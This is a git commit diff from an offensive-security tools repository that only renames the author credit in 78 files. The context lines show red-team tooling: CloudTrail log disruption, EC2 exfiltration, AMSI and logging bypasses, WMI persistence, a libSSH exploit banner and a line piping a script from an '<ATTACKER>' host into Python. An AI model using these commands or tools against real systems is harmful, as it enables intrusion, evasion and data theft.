Mariusz B. / mgeeky 2021-10-24 23:11:42 +02:00
parent 2e115fe796
commit 558762a498
78 changed files with 124 additions and 124 deletions


@ -36,6 +36,6 @@ This and other projects are outcome of sleepless nights and **plenty of hard wor
---
```
Mariusz B. / mgeeky, (@mariuszbit)
Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com>
```


@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Will be working on Account ID: 712800000000
[.] Step 1: Determine trail to disrupt
@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Using attacker's profile: default
[.] Using victim's profile: victim-profile


@ -3,7 +3,7 @@
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
#
# Mariusz B., mgeeky '19-20
# Mariusz Banach, mgeeky '19-20
#


@ -38,7 +38,7 @@
# - boto3
# - pytest
#
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
# Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
#
@ -427,7 +427,7 @@ def parseOptions(argv):
print('''
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')


@ -5,7 +5,7 @@
# policy statements. Then goes through allowed permissions to pick all of them out.
# Finally, checks every allowed permission against a list of known troublesome ones.
#
# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
# Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
# v0.1
#


@ -33,7 +33,7 @@
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests
#
# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
# Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
@ -422,7 +422,7 @@ def parseOptions(argv):
print('''
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0])


@ -9,7 +9,7 @@
#
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
#
# Author: Mariusz B., '19, <mb@binary-offensive.com>
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
import zipfile, StringIO


@ -3,7 +3,7 @@
# This script leverages couple of methods in order to validate that passed
# domain is a S3 bucket indeed.
#
# Mariusz B., 2019, <mb@binary-offensive.com>
# Mariusz Banach, 2019, <mb@binary-offensive.com>
#
require 'resolv'
@ -245,7 +245,7 @@ def main(args)
puts %{
:: Identifies AWS S3 Buckets via couple of methods
Mariusz B. 19', <mb@binary-offensive.com>
Mariusz Banach 19', <mb@binary-offensive.com>
}
if ARGV.length != 1


@ -20,7 +20,7 @@
# Requirements:
# - gem "aws-sdk-ec2"
#
# Author: Mariusz B., '19, <mb@binary-offensive.com>
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
require 'aws-sdk-ec2'


@ -8,7 +8,7 @@ c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
:: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
Step 1. Renaming UPX sections...
Renamed UPX section (UPX0 ) => (.text)


@ -119,7 +119,7 @@ def main(argv):
:: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
''')
if len(argv) < 2:


@ -1,7 +1,7 @@
#!/bin/bash
#
# OpenVAS automation script.
# Mariusz B. / mgeeky, '17
# Mariusz Banach / mgeeky, '17
# v0.2
#


@ -13,7 +13,7 @@
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
# - only tools that I've found useful at least once are landing in this script.
#
# Mariusz B., '18-'19
# Mariusz Banach, '18-'19
#
# Well, entire Kali installation assume that we are normally working as root on our Kali.


@ -8,7 +8,7 @@
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
#
import sys
@ -202,7 +202,7 @@ def parseOptions(argv):
print('''
:: CDP Flooding / Denial of Service tool
Floods the interface with fake, randomly generated CDP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))


@ -6,7 +6,7 @@
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
#
import sys
@ -122,7 +122,7 @@ def parseOptions(argv):
print('''
:: HSRP Flooding / Denial of Service tool
Floods the interface with Active router Coup HSRP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))


@ -33,7 +33,7 @@ PS D:\> python3 .\exchangeRecon.py 10.10.10.9
:: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.2
[.] Probing for Exchange fingerprints...
@ -141,7 +141,7 @@ bash $ python RoutingAttackKit.py
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1
Available attacks:
@ -157,7 +157,7 @@ bash # python RoutingAttackKit.py -t rip-fuzzer -v
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1
[.] Using 192.168.1.14 as local/spoof IP address
@ -241,7 +241,7 @@ $ ./VLANHopperDTP.py --help
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18
Mariusz Banach / mgeeky, '18
v0.3
usage: ./VLANHopperDTP.py [options]
@ -279,7 +279,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18
Mariusz Banach / mgeeky, '18
v0.2
[+] VLAN Hopping IS possible.


@ -13,7 +13,7 @@
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
@ -618,7 +618,7 @@ def parseOptions(argv):
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))


@ -39,7 +39,7 @@
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network
#
# Mariusz B. / mgeeky, '18-19, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
#
import os
@ -724,7 +724,7 @@ def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18-19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))


@ -5,7 +5,7 @@
# the switch's port. This reconessaince will be helpful for performing
# VLAN Hopping attacks.
#
# Mariusz B. / mgeeky, '18
# Mariusz Banach / mgeeky, '18
#
import os


@ -32,7 +32,7 @@
# - packaging
#
# Author:
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import re
@ -1300,7 +1300,7 @@ def parseOptions(argv):
print('''
:: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))


@ -6,7 +6,7 @@
#
# Based on "Black Hat Python" book by Justin Seitz.
#
# Mariusz B.
# Mariusz Banach
#
import os


@ -51,7 +51,7 @@ if __name__ == '__main__':
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
print '\tMariusz B. / mgeeky, 2016\n'
print '\tMariusz Banach / mgeeky, 2016\n'
host = sys.argv[1]
if not host.startswith('http'):


@ -25,7 +25,7 @@
# Requirements:
# - paramiko
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
#
import sys
@ -360,7 +360,7 @@ def main():
sys.stderr.write('''
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))


@ -5,7 +5,7 @@
# configuration files in order to extract plain and cipher passwords out of them.
# Equipped with functionality to decrypt Cisco Type 7 passwords.
#
# Mariusz B., mgeeky '18-20
# Mariusz Banach, mgeeky '18-20
#
import re
@ -427,7 +427,7 @@ def printResults():
def main(argv):
Logger._out('''
:: Network-configuration Credentials extraction script
Mariusz B. / mgeeky, '18
Mariusz Banach / mgeeky, '18
''')
opts = parseOptions(argv)
if not opts:


@ -72,7 +72,7 @@
# - Microsoft Exchange Server 2013
#
# Author:
# Mariusz B. / mgeeky, '17-19,
# Mariusz Banach / mgeeky, '17-19,
# <mb@binary-offensive.com>
#
@ -2958,7 +2958,7 @@ Date: {dateNow}
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
by Mariusz B. / mgeeky (<mb@binary-offensive.com>)
by Mariusz Banach / mgeeky (<mb@binary-offensive.com>)
.
'''
@ -3698,7 +3698,7 @@ class ParseOptions:
def banner():
sys.stderr.write('''
:: SMTP Black-Box Audit tool.
v{}, Mariusz B. / mgeeky, '17
v{}, Mariusz Banach / mgeeky, '17
'''.format(VERSION))
@ -3828,7 +3828,7 @@ def main(argv):
sys.stderr.write('''
:: SMTP configuration Audit / Penetration-testing tool
Intended to be used as a black-box tool revealing security state of SMTP.
Mariusz B. / mgeeky, '17-19
Mariusz Banach / mgeeky, '17-19
v{}
'''.format(VERSION))


@ -3,7 +3,7 @@
# Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it.
#
# Mariusz B., 2016
# Mariusz Banach, 2016
#
import socket


@ -7,7 +7,7 @@
# Nothing fancy, just set of needed commands. Especially handy when
# used with `startEAPHammer.sh` script.
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
#
if [ $# -ne 2 ]; then


@ -5,7 +5,7 @@
# that takes as input list of APs against which should deauth be launched,
# and then attempts that attack.
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
#
if [ $# -ne 1 ]; then


@ -14,7 +14,7 @@
# Especially handy when used with companion script called:
# `initDHCPServer.sh`
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
#
####################################################################


@ -5,7 +5,7 @@ Create Contoso Users in Active Directory This script creates 270 + users in Acti
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
***Modified by: Mariusz B., mb@binary-offensive.com - @mgeeky***
***Modified by: Mariusz Banach, mb@binary-offensive.com - @mgeeky***
**To Use:**
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.


@ -3,7 +3,7 @@
# with incoming OBEX Object Push requests containing
# specified file.
#
# Mariusz B. / MGeeky, 16'
# Mariusz Banach / MGeeky, 16'
#
# Partially based on `Violent Python` snippets.
# Modules required:
@ -79,7 +79,7 @@ def main():
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
print '\nBluetooth file carpet bombing via OBEX Object Push'
print 'Mariusz B. / MGeeky 16\n'
print 'Mariusz Banach / MGeeky 16\n'
(opts, args) = parser.parse_args()


@ -14,7 +14,7 @@
# WILL RETURN:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
#
# Mariusz B. / mgeeky
# Mariusz Banach / mgeeky
#
import sys, os


@ -4,7 +4,7 @@
# In latter case producing encrypted ZIP package that will get decompressed automatically
# after decryption.
#
# Mariusz B., 2016 v0.1
# Mariusz Banach, 2016 v0.1
#
require 'optparse'


@ -11,7 +11,7 @@
# - scanning for other VMs
# - setting selected VM's IP address within /etc/hosts (and alike) file
#
# Mariusz B. / mgeeky, '16-'19
# Mariusz Banach / mgeeky, '16-'19
# v0.7
#


@ -3,7 +3,7 @@
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
# it searches for proper key that could decrypt cipher into text.
#
# Mariusz B., 2016
# Mariusz Banach, 2016
#
import sys


@ -15,7 +15,7 @@
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
' Mariusz Banach / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean


@ -45,7 +45,7 @@
# - packaging
# - dnspython
#
# Mariusz B. / mgeeky, '21
# Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com>
#


@ -37,7 +37,7 @@ PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
[+] Template to use:
ID: 22


@ -165,7 +165,7 @@ def main(argv):
print('''
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
''')
template = getTemplate()


@ -205,7 +205,7 @@ def main(argv):
print('''
:: Phishing HTML Linter
Shows you bad smells in your HTML code that will get your mails busted!
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
''')
html = ''


@ -19,7 +19,7 @@
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
' Mariusz Banach / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean


@ -100,7 +100,7 @@ function Bypass-CLM
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
Write-Host "`n`tRe-implemented, enhanced by: Mariusz B., mgeeky"
Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky"
Write-Host "`t-----`n"
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"

File diff suppressed because one or more lines are too long


@ -2,7 +2,7 @@
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to
* call .NET APIs from an unmanaged runtime.
*
* Mariusz B., mgeeky, 19'
* Mariusz Banach, mgeeky, 19'
*
**/


@ -26,7 +26,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky
Re-implemented, enhanced by: Mariusz Banach, mgeeky
-----
[.] Step 0. Planted DLL files in:


@ -22,7 +22,7 @@ The script offers subcommands-kind of CLI interface, so after every command one
PS> py .\c3-client.py --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage:
Usage: ./c3-client.py [options] <host> <command> [...]
@ -59,7 +59,7 @@ optional arguments:
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
@ -144,7 +144,7 @@ This example shows how to keep all of your Relays pinged every 45 seconds:
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Sending a ping every 45 seconds.
[.] Pinged relay: matter4 from gateway gate4
@ -170,7 +170,7 @@ Ever suffered from a poor C3 bandwidth or general performance? Worry not - you c
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
:: C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] LDAP: Clearing messages queue...
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
@ -213,7 +213,7 @@ In this example setup an alarm that triggers upon new Relay checking-in. Wheneve
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Entering infinite-loop awaiting for new Relays...
[+] New Relay checked-in!
@ -325,6 +325,6 @@ py c3-client.py http://192.168.0.200:52935 ping -k 45
## Author
```
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
```


@ -2036,7 +2036,7 @@ def parseArgs(argv):
def main(argv):
print('''
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''')
parseArgs(argv)


@ -8,7 +8,7 @@
PS> . .\Count-PrivilegedGroupMembers.ps1
PS> Count-PrivilegedGroupMembers
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
#>
# This script requires PowerView 3.0 dev branch


@ -5,7 +5,7 @@
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None


@ -5,7 +5,7 @@
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None


@ -5,7 +5,7 @@
files for later processing. This script is compatible with newest PowerView's version,
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
Author: Mariusz B. (mgeeky), '18
Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>


@ -1,7 +1,7 @@
#requires -version 2
<#
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: PowerView.ps1
Optional Dependencies: None
@ -12,7 +12,7 @@ function Get-DomainOUTree
<#
.SYNOPSIS
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: PowerView.ps1
Optional Dependencies: None
@ -65,7 +65,7 @@ function Get-NetOUTree
<#
.SYNOPSIS
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: PowerView.ps1
Optional Dependencies: None


@ -8,7 +8,7 @@
PS> . .\Get-UserPasswordEntries.ps1
PS> Get-UserPasswordEntries
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
#>
# This script requires PowerView 3.0 dev branch


@ -15,7 +15,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky
Re-implemented, enhanced by: Mariusz Banach, mgeeky
-----
[.] Step 0. Planted DLL files in:
@ -180,7 +180,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
@ -189,7 +189,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV">
<hwiJYmWvD />
@ -237,7 +237,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
@ -363,7 +363,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled.
@ -395,7 +395,7 @@ This script contains malicious content and has been blocked by your antivirus so
PS D:\> .\Stracciatella.exe -v
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[-] It looks like no script path was given.
[+] AMSI Disabled.


@ -5,7 +5,7 @@
This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18
Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>


@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'


@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'


@ -2,7 +2,7 @@
' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'


@ -2,7 +2,7 @@
' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'


@ -2,7 +2,7 @@
' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0)
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'


@ -3,7 +3,7 @@
' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'


@ -12,7 +12,7 @@
# - raw Shellcode in a separate thread via CreateThread
# - .NET Assembly via Assembly.Load
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
#
import re
@ -479,7 +479,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName">
<$templateName />
@ -584,7 +584,7 @@ def main(argv):
sys.stderr.write('''
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''')
if len(argv) < 2:


@ -7,7 +7,7 @@
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
# future use of BloodHound.
#
# Mariusz B. / mgeeky
# Mariusz Banach / mgeeky
#
import sys


@ -3,7 +3,7 @@
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
<!-- Modified by Mariusz B. / mgeeky. -->
<!-- Modified by Mariusz Banach / mgeeky. -->
<Target Name="MyLittleInlineTaskName">
<MyLittleInlineTask />


@ -23,7 +23,7 @@ python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile>
@ -43,7 +43,7 @@ python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode.


@ -34,7 +34,7 @@
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
#
import re
@ -519,7 +519,7 @@ def getSourceFileContents(
/*
Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
Customized by: Mariusz Banach / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk
@ -806,7 +806,7 @@ def main(argv):
sys.stderr.write('''
:: Rogue .NET Source Code Generation Utility
